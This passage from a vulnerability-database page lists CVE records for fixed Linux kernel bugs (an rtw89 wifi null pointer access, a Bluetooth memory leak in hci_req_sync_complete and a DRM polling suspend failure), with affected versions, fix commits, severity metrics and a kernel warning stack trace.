          "versions": [
            {
              "status": "affected",
              "version": "5.16"
            },
            {
              "lessThan": "5.16",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "5.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "5.16",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.16",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtw89: fix null pointer access when abort scan\n\nDuring cancel scan we might use vif that weren\u0027t scanning.\nFix this by using the actual scanning vif."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:08:59.002Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b34d64e9aa5505e3c84570aed5c757f1839573e8"
        },
        {
          "url": "https://git.kernel.org/stable/c/4f11c741908dab7dd48fa5a986b210d4fc74ca8d"
        },
        {
          "url": "https://git.kernel.org/stable/c/7e11a2966f51695c0af0b1f976a32d64dee243b2"
        }
      ],
      "title": "wifi: rtw89: fix null pointer access when abort scan",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35946",
    "datePublished": "2024-05-19T10:10:49.493Z",
    "dateReserved": "2024-05-17T13:50:33.133Z",
    "dateUpdated": "2025-05-04T09:08:59.002Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35978 (GCVE-0-2024-35978)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:42 – Updated: 2025-05-04 09:09

Title

Bluetooth: Fix memory leak in hci_req_sync_complete()

Summary

In the Linux kernel, the following vulnerability has been resolved: Bluetooth: Fix memory leak in hci_req_sync_complete() In 'hci_req_sync_complete()', always free the previous sync request state before assigning reference to a new one.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/89a32741f42178560…
	https://git.kernel.org/stable/c/4beab84fbb50df3be…
	https://git.kernel.org/stable/c/8478394f76c748862…
	https://git.kernel.org/stable/c/75193678cce993aa9…
	https://git.kernel.org/stable/c/66fab1e120b39f8f4…
	https://git.kernel.org/stable/c/9ab5e44b9bac946bd…
	https://git.kernel.org/stable/c/e4cb8382fff670643…
	https://git.kernel.org/stable/c/45d355a926ab40f3a…

Impacted products

Vendor

Product

Version

Linux

Affected: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 , < 89a32741f4217856066c198a4a7267bcdd1edd67 (git)
Affected: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 , < 4beab84fbb50df3be1d8f8a976e6fe882ca65cb2 (git)
Affected: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 , < 8478394f76c748862ef179a16f651f752bdafaf0 (git)
Affected: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 , < 75193678cce993aa959e7764b6df2f599886dd06 (git)
Affected: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 , < 66fab1e120b39f8f47a94186ddee36006fc02ca8 (git)
Affected: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 , < 9ab5e44b9bac946bd49fd63264a08cd1ea494e76 (git)
Affected: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 , < e4cb8382fff6706436b66eafd9c0ee857ff0a9f5 (git)
Affected: f60cb30579d3401cab1ed36b42df5c0568ae0ba7 , < 45d355a926ab40f3ae7bc0b0a00cb0e3e8a5a810 (git)

Linux

Affected: 4.1
Unaffected: 0 , < 4.1 (semver)
Unaffected: 4.19.313 , ≤ 4.19.* (semver)
Unaffected: 5.4.275 , ≤ 5.4.* (semver)
Unaffected: 5.10.216 , ≤ 5.10.* (semver)
Unaffected: 5.15.156 , ≤ 5.15.* (semver)
Unaffected: 6.1.87 , ≤ 6.1.* (semver)
Unaffected: 6.6.28 , ≤ 6.6.* (semver)
Unaffected: 6.8.7 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.106Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/89a32741f4217856066c198a4a7267bcdd1edd67"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4beab84fbb50df3be1d8f8a976e6fe882ca65cb2"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8478394f76c748862ef179a16f651f752bdafaf0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/75193678cce993aa959e7764b6df2f599886dd06"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/66fab1e120b39f8f47a94186ddee36006fc02ca8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9ab5e44b9bac946bd49fd63264a08cd1ea494e76"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e4cb8382fff6706436b66eafd9c0ee857ff0a9f5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/45d355a926ab40f3ae7bc0b0a00cb0e3e8a5a810"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35978",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:40:19.764232Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:13.184Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/bluetooth/hci_request.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "89a32741f4217856066c198a4a7267bcdd1edd67",
              "status": "affected",
              "version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
              "versionType": "git"
            },
            {
              "lessThan": "4beab84fbb50df3be1d8f8a976e6fe882ca65cb2",
              "status": "affected",
              "version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
              "versionType": "git"
            },
            {
              "lessThan": "8478394f76c748862ef179a16f651f752bdafaf0",
              "status": "affected",
              "version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
              "versionType": "git"
            },
            {
              "lessThan": "75193678cce993aa959e7764b6df2f599886dd06",
              "status": "affected",
              "version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
              "versionType": "git"
            },
            {
              "lessThan": "66fab1e120b39f8f47a94186ddee36006fc02ca8",
              "status": "affected",
              "version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
              "versionType": "git"
            },
            {
              "lessThan": "9ab5e44b9bac946bd49fd63264a08cd1ea494e76",
              "status": "affected",
              "version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
              "versionType": "git"
            },
            {
              "lessThan": "e4cb8382fff6706436b66eafd9c0ee857ff0a9f5",
              "status": "affected",
              "version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
              "versionType": "git"
            },
            {
              "lessThan": "45d355a926ab40f3ae7bc0b0a00cb0e3e8a5a810",
              "status": "affected",
              "version": "f60cb30579d3401cab1ed36b42df5c0568ae0ba7",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/bluetooth/hci_request.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.1"
            },
            {
              "lessThan": "4.1",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.313",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.275",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.216",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.156",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.87",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.28",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.313",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.275",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.216",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.156",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.87",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.28",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.7",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "4.1",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: Fix memory leak in hci_req_sync_complete()\n\nIn \u0027hci_req_sync_complete()\u0027, always free the previous sync\nrequest state before assigning reference to a new one."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:09:43.997Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/89a32741f4217856066c198a4a7267bcdd1edd67"
        },
        {
          "url": "https://git.kernel.org/stable/c/4beab84fbb50df3be1d8f8a976e6fe882ca65cb2"
        },
        {
          "url": "https://git.kernel.org/stable/c/8478394f76c748862ef179a16f651f752bdafaf0"
        },
        {
          "url": "https://git.kernel.org/stable/c/75193678cce993aa959e7764b6df2f599886dd06"
        },
        {
          "url": "https://git.kernel.org/stable/c/66fab1e120b39f8f47a94186ddee36006fc02ca8"
        },
        {
          "url": "https://git.kernel.org/stable/c/9ab5e44b9bac946bd49fd63264a08cd1ea494e76"
        },
        {
          "url": "https://git.kernel.org/stable/c/e4cb8382fff6706436b66eafd9c0ee857ff0a9f5"
        },
        {
          "url": "https://git.kernel.org/stable/c/45d355a926ab40f3ae7bc0b0a00cb0e3e8a5a810"
        }
      ],
      "title": "Bluetooth: Fix memory leak in hci_req_sync_complete()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35978",
    "datePublished": "2024-05-20T09:42:03.759Z",
    "dateReserved": "2024-05-17T13:50:33.144Z",
    "dateUpdated": "2025-05-04T09:09:43.997Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35927 (GCVE-0-2024-35927)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2025-06-19 12:37

Title

drm: Check output polling initialized before disabling

Summary

In the Linux kernel, the following vulnerability has been resolved: drm: Check output polling initialized before disabling In drm_kms_helper_poll_disable() check if output polling support is initialized before disabling polling. If not flag this as a warning. Additionally in drm_mode_config_helper_suspend() and drm_mode_config_helper_resume() calls, that re the callers of these functions, avoid invoking them if polling is not initialized. For drivers like hyperv-drm, that do not initialize connector polling, if suspend is called without this check, it leads to suspend failure with following stack [ 770.719392] Freezing remaining freezable tasks ... (elapsed 0.001 seconds) done. [ 770.720592] printk: Suspending console(s) (use no_console_suspend to debug) [ 770.948823] ------------[ cut here ]------------ [ 770.948824] WARNING: CPU: 1 PID: 17197 at kernel/workqueue.c:3162 __flush_work.isra.0+0x212/0x230 [ 770.948831] Modules linked in: rfkill nft_counter xt_conntrack xt_owner udf nft_compat crc_itu_t nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_inet nf_reject_ipv4 nf_reject_ipv6 nft_reject nft_ct nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 ip_set nf_tables nfnetlink vfat fat mlx5_ib ib_uverbs ib_core mlx5_core intel_rapl_msr intel_rapl_common kvm_amd ccp mlxfw kvm psample hyperv_drm tls drm_shmem_helper drm_kms_helper irqbypass pcspkr syscopyarea sysfillrect sysimgblt hv_balloon hv_utils joydev drm fuse xfs libcrc32c pci_hyperv pci_hyperv_intf sr_mod sd_mod cdrom t10_pi sg hv_storvsc scsi_transport_fc hv_netvsc serio_raw hyperv_keyboard hid_hyperv crct10dif_pclmul crc32_pclmul crc32c_intel hv_vmbus ghash_clmulni_intel dm_mirror dm_region_hash dm_log dm_mod [ 770.948863] CPU: 1 PID: 17197 Comm: systemd-sleep Not tainted 5.14.0-362.2.1.el9_3.x86_64 #1 [ 770.948865] Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS Hyper-V UEFI Release v4.1 05/09/2022 [ 770.948866] RIP: 0010:__flush_work.isra.0+0x212/0x230 [ 770.948869] Code: 8b 4d 00 4c 8b 45 08 89 ca 48 c1 e9 04 83 e2 08 83 e1 0f 83 ca 02 89 c8 48 0f ba 6d 00 03 e9 25 ff ff ff 0f 0b e9 4e ff ff ff <0f> 0b 45 31 ed e9 44 ff ff ff e8 8f 89 b2 00 66 66 2e 0f 1f 84 00 [ 770.948870] RSP: 0018:ffffaf4ac213fb10 EFLAGS: 00010246 [ 770.948871] RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffffff8c992857 [ 770.948872] RDX: 0000000000000001 RSI: 0000000000000001 RDI: ffff9aad82b00330 [ 770.948873] RBP: ffff9aad82b00330 R08: 0000000000000000 R09: ffff9aad87ee3d10 [ 770.948874] R10: 0000000000000200 R11: 0000000000000000 R12: ffff9aad82b00330 [ 770.948874] R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000001 [ 770.948875] FS: 00007ff1b2f6bb40(0000) GS:ffff9aaf37d00000(0000) knlGS:0000000000000000 [ 770.948878] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 770.948878] CR2: 0000555f345cb666 CR3: 00000001462dc005 CR4: 0000000000370ee0 [ 770.948879] Call Trace: [ 770.948880] <TASK> [ 770.948881] ? show_trace_log_lvl+0x1c4/0x2df [ 770.948884] ? show_trace_log_lvl+0x1c4/0x2df [ 770.948886] ? __cancel_work_timer+0x103/0x190 [ 770.948887] ? __flush_work.isra.0+0x212/0x230 [ 770.948889] ? __warn+0x81/0x110 [ 770.948891] ? __flush_work.isra.0+0x212/0x230 [ 770.948892] ? report_bug+0x10a/0x140 [ 770.948895] ? handle_bug+0x3c/0x70 [ 770.948898] ? exc_invalid_op+0x14/0x70 [ 770.948899] ? asm_exc_invalid_op+0x16/0x20 [ 770.948903] ? __flush_work.isra.0+0x212/0x230 [ 770.948905] __cancel_work_timer+0x103/0x190 [ 770.948907] ? _raw_spin_unlock_irqrestore+0xa/0x30 [ 770.948910] drm_kms_helper_poll_disable+0x1e/0x40 [drm_kms_helper] [ 770.948923] drm_mode_config_helper_suspend+0x1c/0x80 [drm_kms_helper] [ 770.948933] ? __pfx_vmbus_suspend+0x10/0x10 [hv_vmbus] [ 770.948942] hyperv_vmbus_suspend+0x17/0x40 [hyperv_drm] [ 770.948944] ? __pfx_vmbus_suspend+0x10/0x10 [hv_vmbus] [ 770.948951] dpm_run_callback+0x4c/0x140 [ 770.948954] __device_suspend_noir ---truncated---

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/3d1b47e3a935abd4f…
	https://git.kernel.org/stable/c/18451798f4a4e7418…
	https://git.kernel.org/stable/c/5abffb66d12bcac84…

Impacted products

Vendor

Product

Version

Linux

Affected: 78b991ccfa64a438e2d8c2997d22d55621ab277d , < 3d1b47e3a935abd4f258a945db87e7267ff4079c (git)
Affected: 78b991ccfa64a438e2d8c2997d22d55621ab277d , < 18451798f4a4e7418b9fad7e7dd313fe84b1f545 (git)
Affected: 78b991ccfa64a438e2d8c2997d22d55621ab277d , < 5abffb66d12bcac84bf7b66389c571b8bb6e82bd (git)

Linux

Affected: 6.3
Unaffected: 0 , < 6.3 (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 5.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35927",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-29T18:18:22.364810Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-10-29T19:54:14.353Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.874Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/786c27982a39d79cc753f84229eb5977ac8ef1c1"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4ad8d57d902fbc7c82507cfc1b031f3a07c3de6e"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3d1b47e3a935abd4f258a945db87e7267ff4079c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/18451798f4a4e7418b9fad7e7dd313fe84b1f545"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5abffb66d12bcac84bf7b66389c571b8bb6e82bd"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/drm_modeset_helper.c",
            "drivers/gpu/drm/drm_probe_helper.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "3d1b47e3a935abd4f258a945db87e7267ff4079c",
              "status": "affected",
              "version": "78b991ccfa64a438e2d8c2997d22d55621ab277d",
              "versionType": "git"
            },
            {
              "lessThan": "18451798f4a4e7418b9fad7e7dd313fe84b1f545",
              "status": "affected",
              "version": "78b991ccfa64a438e2d8c2997d22d55621ab277d",
              "versionType": "git"
            },
            {
              "lessThan": "5abffb66d12bcac84bf7b66389c571b8bb6e82bd",
              "status": "affected",
              "version": "78b991ccfa64a438e2d8c2997d22d55621ab277d",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/drm_modeset_helper.c",
            "drivers/gpu/drm/drm_probe_helper.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "6.3"
            },
            {
              "lessThan": "6.3",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "6.3",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm: Check output polling initialized before disabling\n\nIn drm_kms_helper_poll_disable() check if output polling\nsupport is initialized before disabling polling. If not flag\nthis as a warning.\nAdditionally in drm_mode_config_helper_suspend() and\ndrm_mode_config_helper_resume() calls, that re the callers of these\nfunctions, avoid invoking them if polling is not initialized.\nFor drivers like hyperv-drm, that do not initialize connector\npolling, if suspend is called without this check, it leads to\nsuspend failure with following stack\n[  770.719392] Freezing remaining freezable tasks ... (elapsed 0.001 seconds) done.\n[  770.720592] printk: Suspending console(s) (use no_console_suspend to debug)\n[  770.948823] ------------[ cut here ]------------\n[  770.948824] WARNING: CPU: 1 PID: 17197 at kernel/workqueue.c:3162 __flush_work.isra.0+0x212/0x230\n[  770.948831] Modules linked in: rfkill nft_counter xt_conntrack xt_owner udf nft_compat crc_itu_t nft_fib_inet nft_fib_ipv4 nft_fib_ipv6 nft_fib nft_reject_inet nf_reject_ipv4 nf_reject_ipv6 nft_reject nft_ct nft_chain_nat nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 ip_set nf_tables nfnetlink vfat fat mlx5_ib ib_uverbs ib_core mlx5_core intel_rapl_msr intel_rapl_common kvm_amd ccp mlxfw kvm psample hyperv_drm tls drm_shmem_helper drm_kms_helper irqbypass pcspkr syscopyarea sysfillrect sysimgblt hv_balloon hv_utils joydev drm fuse xfs libcrc32c pci_hyperv pci_hyperv_intf sr_mod sd_mod cdrom t10_pi sg hv_storvsc scsi_transport_fc hv_netvsc serio_raw hyperv_keyboard hid_hyperv crct10dif_pclmul crc32_pclmul crc32c_intel hv_vmbus ghash_clmulni_intel dm_mirror dm_region_hash dm_log dm_mod\n[  770.948863] CPU: 1 PID: 17197 Comm: systemd-sleep Not tainted 5.14.0-362.2.1.el9_3.x86_64 #1\n[  770.948865] Hardware name: Microsoft Corporation Virtual Machine/Virtual Machine, BIOS Hyper-V UEFI Release v4.1 05/09/2022\n[  770.948866] RIP: 0010:__flush_work.isra.0+0x212/0x230\n[  770.948869] Code: 8b 4d 00 4c 8b 45 08 89 ca 48 c1 e9 04 83 e2 08 83 e1 0f 83 ca 02 89 c8 48 0f ba 6d 00 03 e9 25 ff ff ff 0f 0b e9 4e ff ff ff \u003c0f\u003e 0b 45 31 ed e9 44 ff ff ff e8 8f 89 b2 00 66 66 2e 0f 1f 84 00\n[  770.948870] RSP: 0018:ffffaf4ac213fb10 EFLAGS: 00010246\n[  770.948871] RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffffffff8c992857\n[  770.948872] RDX: 0000000000000001 RSI: 0000000000000001 RDI: ffff9aad82b00330\n[  770.948873] RBP: ffff9aad82b00330 R08: 0000000000000000 R09: ffff9aad87ee3d10\n[  770.948874] R10: 0000000000000200 R11: 0000000000000000 R12: ffff9aad82b00330\n[  770.948874] R13: 0000000000000001 R14: 0000000000000000 R15: 0000000000000001\n[  770.948875] FS:  00007ff1b2f6bb40(0000) GS:ffff9aaf37d00000(0000) knlGS:0000000000000000\n[  770.948878] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[  770.948878] CR2: 0000555f345cb666 CR3: 00000001462dc005 CR4: 0000000000370ee0\n[  770.948879] Call Trace:\n[  770.948880]  \u003cTASK\u003e\n[  770.948881]  ? show_trace_log_lvl+0x1c4/0x2df\n[  770.948884]  ? show_trace_log_lvl+0x1c4/0x2df\n[  770.948886]  ? __cancel_work_timer+0x103/0x190\n[  770.948887]  ? __flush_work.isra.0+0x212/0x230\n[  770.948889]  ? __warn+0x81/0x110\n[  770.948891]  ? __flush_work.isra.0+0x212/0x230\n[  770.948892]  ? report_bug+0x10a/0x140\n[  770.948895]  ? handle_bug+0x3c/0x70\n[  770.948898]  ? exc_invalid_op+0x14/0x70\n[  770.948899]  ? asm_exc_invalid_op+0x16/0x20\n[  770.948903]  ? __flush_work.isra.0+0x212/0x230\n[  770.948905]  __cancel_work_timer+0x103/0x190\n[  770.948907]  ? _raw_spin_unlock_irqrestore+0xa/0x30\n[  770.948910]  drm_kms_helper_poll_disable+0x1e/0x40 [drm_kms_helper]\n[  770.948923]  drm_mode_config_helper_suspend+0x1c/0x80 [drm_kms_helper]\n[  770.948933]  ? __pfx_vmbus_suspend+0x10/0x10 [hv_vmbus]\n[  770.948942]  hyperv_vmbus_suspend+0x17/0x40 [hyperv_drm]\n[  770.948944]  ? __pfx_vmbus_suspend+0x10/0x10 [hv_vmbus]\n[  770.948951]  dpm_run_callback+0x4c/0x140\n[  770.948954]  __device_suspend_noir\n---truncated---"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-06-19T12:37:41.851Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/3d1b47e3a935abd4f258a945db87e7267ff4079c"
        },
        {
          "url": "https://git.kernel.org/stable/c/18451798f4a4e7418b9fad7e7dd313fe84b1f545"
        },
        {
